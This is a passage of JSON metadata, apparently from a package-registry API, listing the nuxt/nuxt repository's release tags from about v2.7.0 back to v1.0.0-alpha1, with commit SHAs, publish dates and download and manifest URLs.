uxt@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1